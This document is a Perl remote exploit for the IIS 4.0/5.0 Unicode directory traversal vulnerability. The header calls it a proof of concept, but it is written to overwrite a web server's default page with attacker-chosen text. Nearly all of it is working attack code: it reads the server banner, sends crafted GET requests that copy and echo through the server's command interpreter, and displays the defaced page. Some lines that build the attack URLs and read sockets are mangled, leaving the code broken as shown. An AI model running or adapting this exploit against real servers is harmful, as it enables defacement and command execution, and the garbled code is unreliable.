#!/usr/bin/perl -w ## [ FOR TESTING PURPOSES ONLY - THIS IS NOT A DEFACEMENT TOOL! ] ## ## Microsoft-IIS Remote Proof of Concept Exploit ## (Unicode vulnerability) ## ## ------------------------------------------------------------- ## ## Vulnerable: ## ~~~~~~~~~~~ ## -- Microsoft IIS 5.0 / Microsoft Windows NT 2000 ## -- Microsoft IIS 4.0 / Microsoft Windows NT 4.0 ## ## -- Microsoft BackOffice 4.5 / Microsoft Windows NT 4.0 ## -- Microsoft BackOffice 4.0 / Microsoft Windows NT 4.0 ## ## ------------------------------------------------------------- ## ## Exploits Details: ## ~~~~~~~~~~~~~~~~~ ## == The host you want to try this on. (surprise) ## ## == A textfile containing what you want to be ## echoed into the index file. Html code will ## not work. Keep it short, like: wh0a, 1t w0rked! ## ## == The path and name of the default html file. If ## you don't define it - this exploit will use: ## C:\inetpub\wwwroot\default.htm as default. ## ## E.g: ./exploit 0 file.txt C:\Inetpub\wwwroot\Default.htm ## ## Note: This (stupid) exploit does not do much error checking. ## ## ------------------------------------------------------------- ## ## Credits: ## ~~~~~~~~ ## - The genius who wrote about this in the Packetstorm forum. ## - Rain.forest.puppy for his advisory with words of wisdom. ## - Nsfocus Security Teams for their great post to Bugtraq. ## ## /* Exploit was tested successfully on W2K using ISS 5.0 */ ## ## teleh0r@doglover.com || http://teleh0r.cjb.net ## ## ------------------------------------------------------------- use Socket; if (@ARGV < 2) { print("Usage: $0 [\n"); exit(1); } my($host,$file,$path,$nl,$string,$copy,$echo, $iaddr,$paddr,$proto,$version); ($host,$file,$path) = @ARGV; $nl = "\015\012\015\012"; # be strict in what you provide... if (!(defined($path))) { $path = "C:\\inetpub\\wwwroot\\default.htm"; # C:\inetpub\wwwroot is the default path on w2k. NT 4? } # Quick and dirty way of getting the server banner. connect_host(); send(SOCKET, "HEAD / HTTP/1.0$nl", 0); LOOP: while (defined($_ = )) { if ($_ =~ m/^Server/) { $version = $_; chomp($version); last(LOOP); } } if (!(defined($version))) { $version = "UNKNOWN"; } print("\nRemote host: $host\n"); print("$version\n"); print("Path: $path\n"); open(FILE, "<$file") || die("Error $file: $!\n"); while (defined($_ = )) { $string .= $_; } close(FILE); $string =~ s/ /\+/g; $string =~ s/\n/\+/g; if ($string =~ m/\>/g || $string =~ m/\+$path"; print("\nAttemting exploitation of $host ...\n\n"); connect_host(); send(SOCKET,"GET $copy HTTP/1.0$nl", 0); close(SOCKET); sleep(5); # Don't you remember how slow Windows is? connect_host(); send(SOCKET,"GET $echo HTTP/1.0$nl", 0); close(SOCKET); sleep(5); # Let me tell you then - it is s l o w ! print("-"x"50", "\n\n"); connect_host(); send(SOCKET,"GET / HTTP/1.0$nl", 0); # I'm lazy while (defined($_ = )) { print("$_"); } close(SOCKET); print("\n", "-"x"50", "\n"); exit(0); sub connect_host { $iaddr = inet_aton($host) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); }